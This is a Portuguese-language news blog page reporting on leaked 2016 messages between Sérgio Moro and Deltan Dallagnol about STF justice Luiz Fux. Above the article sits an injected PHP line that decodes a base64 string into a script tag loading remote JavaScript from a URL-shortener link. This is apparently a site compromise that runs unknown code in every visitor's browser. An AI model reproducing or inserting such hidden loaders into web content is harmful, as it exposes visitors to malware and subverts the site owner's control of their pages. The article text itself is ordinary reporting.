$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

‘In Fux we trust’; novo trecho de conversa mostra confiança de Moro em Fux

‘In Fux we trust’; novo trecho de conversa mostra confiança de Moro em Fux
13 Jun 2019

Mais um trecho das conversas vazadas envolvendo o ministro da Justiça, Sérgio Moro, e o coordenador da força-tarefa da Lava-Jato, o procurador Deltan Dallagnol, foi divulgado na noite desta quarta-feira. Desta vez, o ministro do Supremo Tribunal Federal (STF) Luiz Fux é citado. 

Nessa parte da conversa, Dallagnol reporta a Moro uma conversa que teria tido com Fux e que teria recebido o apoio do ministro. Na sequência, o então juiz da 13ª Vara da Justiça Federal, em Curitiba, usa uma expressão em inglês para dizer que daria para confiar no ministro.


A troca de mensagem entre o procurador e o então juiz da Lava-Jato ocorreu em 22 de abril de 2016. A conversa foi revelada por um jornalista do site The Intercept Brasil, em entrevista à Rádio BandNews FM.

O procurador, que afirma no trecho ter sido o interlocutor com Fux, disse que estava satisfeito com o resultado da conversa. No trecho, o ministro doSTF Teori Zavascki, morto em acidente de avião em 2017, também é citado. 

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *